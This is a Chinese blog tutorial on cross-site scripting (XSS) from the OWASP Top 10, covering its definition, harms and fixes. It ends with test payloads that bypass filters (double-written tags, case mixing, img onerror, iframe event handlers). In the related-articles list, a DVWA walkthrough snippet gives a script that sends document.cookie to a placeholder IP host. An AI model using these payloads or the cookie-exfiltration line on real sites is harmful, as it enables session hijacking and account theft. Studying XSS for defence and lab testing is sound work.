《OWASP Top 10--跨站脚本(XSS)》

最新推荐文章于 2024-06-23 20:55:15 发布
最新推荐文章于 2024-06-23 20:55:15 发布
阅读量780 收藏 2
点赞数
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a378177461/article/details/80008431
版权
说明:本文章仅限于对跨站脚本漏洞的学习和了解

        跨站脚本漏洞,即XSS发生在当应用程序发送给浏览器的页面中包含用户提供的数据,而这些数据没有经过适当的验证或转义(Escape)或没有使用安全的JavaScript API。

1、定义

        跨站脚本攻击(Cross Site Scripting),缩写为XSS(为了避免与样式CSS混淆,缩写为XSS),恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的

2、原理

        攻击者利用客户端给网站提交的数据中插入恶意的Javascript代码,并且这些恶意的Javascript代码将会成为应用代码中的一部分了,那么攻击者就可以进行开攻击啦,主要原因是网站对客户端输入的数据过于信任造成的。

        攻击者对含有漏洞的服务器可以发起XSS攻击(注入JS代码),诱使受害者打开受到攻击的服务器URL,受害者在Web浏览器中打开URL,恶意脚本执行

3、危害

        3.1、获得各类帐号,如系统登录帐号、QQ微信登录账号、支付帐号、管理员帐号等

        3.2、能够对公司或企业的敏感隐私数据进行增、删、改、查、读等操作

        3.3、盗窃重要的具有商业价值的资料

        3.4、非法转账

        3.5、强制发送含有木马或恶意的电子邮件

        3.6、网站挂马

        3.7、控制受害者电脑,使其成为靶机,并向其它网站发起攻击

4、修复

        4.1、将重要的cookie标记为http only, 则JavaScript中的document.cookie语句就不能获取到cookie

        4.2、表单数据规定值的类型,例如:年龄应为只能为int、name只能为字母数字组合等

        4.3、对输入的数据进行Html Encode 处理

        4.4、过滤或移除特殊的Html标签, 例如: <script>、<iframe>、&lt; for <、&gt; for >、&quot for

        4.5、过滤JavaScript事件的标签。例如 "οnclick="、"onfocus"

5、测试脚本

        5.1、最简单的脚本:<script>alert(/xss/)</script>

        5.2、双写绕过:<sc<script>ript>alert(/xss/)</script>

        5.3、大小写混淆绕过:<Script>Alert(/xss/)</sCript>

        5.4、img、body等标签绕过:<img src=1 οnerrοr=alert(/xss/)>

        5.5、iframe绕过:<iframe src=1 οnmοuseοver=alert(/xss/) y=2018 /><iframe>

        5.6、盗取Cookie:<script>alert(documen.cookie)</script>



a378177461
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS 跨站脚本
白菜执笔人的博客
03-02 245
Web安全攻防 学习笔记 一、XSS 跨站脚本分类 1.1、XSS 漏洞介绍         跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 web 页面里插入恶意 script 代码,当用户浏览该页时,嵌入其中 web ...
XSS跨站脚本
rita_rweb的博客
09-13 1079
XSS(跨站脚本) XSS是一种发生在前端浏览器端的漏洞,危害对象也是前端用户,形成XSS漏洞的主要原因是程序对输入输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理。 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入。 输出转义:根据输出点的位置对输出到前端的额呢绒进行适当转义。 反射性xss(get) 随意输入字符串,回显who is xxx,i don’t
OWASP top 10 (2017) 学习笔记--跨站脚本XSS
01-16 180
A7:2017 跨站脚本XSS) 漏洞描述: 当应用程序的新网页中包含不受信任的、未经恰当验证或转义的数据时,或者使用可以创建HTML或JavaScript 的浏览器API 更新现有的网页时,就会出现XSS 缺陷。 漏洞影响: 常见危害为窃取凭证为主。该漏洞的危害性由JavaScript代码决定,可参见相关XSS平台或BEEF工具。 检测场景: 基于不同标签的检测命令: ...
OWASP TOP10系列之#TOP7# A7-Cross-Site Scripting (XSS)
weixin_43125873的博客
08-15 321
OWASP TOP10系列之#TOP7# A7-Cross-Site Scripting (XSS) 文章目录OWASP TOP10系列之#TOP7# A7-Cross-Site Scripting (XSS)前言一、XSS是什么?二、如何防御总结 前言 Cross-Site Scripting (XSS) 即跨站脚本攻击,XSSOWASP Top 10 中第二个最普遍的问题,在所有应用程序的大约三分之二中都存在。 一、XSS是什么? 反射型 (Reflected )XSS:应用程序或 API
20-OWASP top10--XXS跨站脚本攻击
最新发布
XLbb的博客
06-23 1284
XSS全称(Cross Site Scripting)跨站脚本攻击,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。这就意味着XSS可以进行“服务端”攻击,因为管理员要比普通用户的权限大得多,一般管理员都可以对网站进行文件管理,数据管理等操作,而攻击者一般也是靠管理员身份作为“跳板”进行实施攻击。XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击代码是javascript语言,但也会使用其它的脚本语言。
OWASP跨站脚本xss基础技能
wutiangui的博客
06-12 1609
简单来说DOM文档就是一份XML文档,当有了DOM标准之后,DOM便将前端html代码化为一个树状结构,方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式,且不需要经过服务端,所以DOM型xss在js前端自己就可以完成数据的输入输出,不与服务器产生交互,这样来说DOM型xss也可以理解为反射性xss。使别的用户访问都会执行相应的嵌入代码。攻击者将已经构造完成的恶意页面发送给用户,用户访问看似正常的页面后收到攻击,这类XSS通常无法直接在URL中看到恶意代码,具有较强的持久性和隐蔽性。
OWASP top10OWASP十大应用安全风险)之A7 跨站脚本XSS
qq_39682037的博客
03-18 2446
跨站脚本XSS跨站脚本XSS)是一个广泛存在的漏洞,会影响许多Web应用程序。XSS攻击包括将恶意的客户端脚本注入网站,并将该网站用作传播方法。 XSS背后的风险在于,它允许攻击者将内容注入网站并修改其显示方式,从而迫使受害者的浏览器在加载页面时执行攻击者提供的代码。 XSS存在于所有应用程序的三分之二中。 通常,XSS漏洞要求用户通过社交工程或通过访问特定页面来触发某种类型的交互。如果...
OWASP top 10 (2017) 学习笔记-注入
01-09 216
A1:2017 - 注入 漏洞描述: 将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。 漏洞影响: 注入能导致数据丢失、破坏或泄露给无授权方,缺乏可审计性或是拒绝服务。注入有时甚至能导致主机被完全接管。 检测场景: SQL...
OWASP Top 10 2017-en-ch.rar
12-06
OWASP Top 10 2017 中文-英文 版本。 总结 一、注入(常见sql注入) 二、失效的身份认证 ...七、跨站脚本攻击(XSS) 八、不安全的反序列化 九、使用含有已知漏洞的组件 十、不足的日志记录和监控
DVWA靶场,集成了owasp top 10漏洞
03-28
3. A3:跨站脚本(Cross-Site Scripting, XSS) - XSS攻击允许攻击者在用户的浏览器上执行恶意代码。在DVWA的XSS练习中,你会学习到反射型XSS、存储型XSS和DOM型XSS的区别和利用方法。 4. A4:脆弱的依赖性管理...
OWASP Top 10 2017 v1.3中文最新版.pdf
08-25
7. **A7:2017 - 跨站脚本XSS)**:攻击者通过注入恶意脚本到网页,从而可以劫持用户会话、窃取数据。 8. **A8:2017 - 不安全的反序列化**:反序列化过程中的漏洞可能导致远程代码执行,使攻击者控制受影响的应用...
前端安全之-XSS(跨站脚本攻击)详解
wb199811的博客
08-17 7930
xss跨站脚本攻击一.XSS的基本概念二、XSS攻击的主要途径三、XSS的分类反射型XSS存储型XSSDOM XSS防范措施利用 CSP利用 HttpOnly 一.XSS的基本概念 XSS又叫CSS (Cross Site Script) ,为了和css(层叠样式表)区分,我们通常称它为(xss)跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 xss是一种发生在web前端的漏洞,所以其危害的对象也主要
XSS 攻击与防御 | OWASP 提供XSS防御方案
sisi_8991的博客
03-31 717
作为搞WEB的JAVA程序员,前台很容易碰到xss类的漏洞,但又不具备专业的安全知识,工作中项目紧的时候又没时间去研究那东西,所以就需要一个拿来就能用的,安全性合格的xss防御方法。 很幸运OWASP就提供了一个供java开发使用的xss防御方案。OWASP Java Encoder Project      OWASP的大名相信搞安全的同学都熟的不能再熟了,OWAS...
OWASP出品:Xenotix XSS漏洞测试框架及简单使用
weixin_30598225的博客
01-23 839
OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞(XSS)检测和攻击测试框架。它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko)进行安全扫描检测,并且其号称拥有全世界第二大的XSS测试Payload,同时具有WAF绕过能力。 扫描模块 Manual Mode Scanner Auto Mode Scanne...
OWASP TOP 10(二)XSS漏洞(盗取cookie、ms10_220_aurora漏洞、XSS平台)
Pluto.的博客
12-15 600
文章目录OWASP TOP 10XSS一、XSS漏洞----cookie1. 盗取cookie2. 利用cookie会话劫持 OWASP TOP 10 XSS 一、XSS漏洞----cookie 1. 盗取cookie 在DVWA靶场上演示。 存在反射型XSS漏洞的站点位置可以利用以下链接来盗取Cookie。 <script>document.location='http://ip/cookie.php文件的绝对路径?cookie='+document.cookie</script>
<web渗透-xss介绍>
weixin_45540964的博客
11-20 316
(1) .简介 --称为跨站脚本攻击 -主要基于.javascript_js 完成恶意的攻击行为 -js可以灵活的操作html,css和浏览器 --XSS通过精心构造(js)代码注入到网页中 由浏览器解释运行这段js,以达到攻击 -用户访问网页时,XSS脚本就会被提取出来 用户浏览器解析后就会收到攻击 --用户最简单的动作就是使用浏览器上网,并且浏览器中 存在javascript解析器, 但解析器并不会判断代码是否恶意 .XSS的漏洞在服务器上 .XSS的攻击对象
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 8991
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
OWASP学习之XSS攻击
s11show_163的博客
02-13 399
标题XSS攻击分为三类: 反射型:不具有持久性,浏览器发送数据给服务器通过PHP代码处理返回给浏览器。 存储型:威胁最大,浏览器发送payload给服务器处理后给数据库。 DOM型:不需要服务器端内容,前端代码出问题导致前端DOM树被修改。 2.存储型 写一个php代码如下(重点注意php连接数据库的操作): phpstudy运行这个页面加入数据库后查询id=1即可运行该script,可通...
OWASP Top 10 - 2010:关键应用安全风险报告
2. **跨站脚本XSS)**:攻击者通过在网页中插入恶意脚本,使得其他用户在访问页面时执行这些脚本,可能导致数据泄露或会话劫持。 3. **不安全的身份验证和会话管理**:如果应用程序的身份验证和会话管理机制设计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值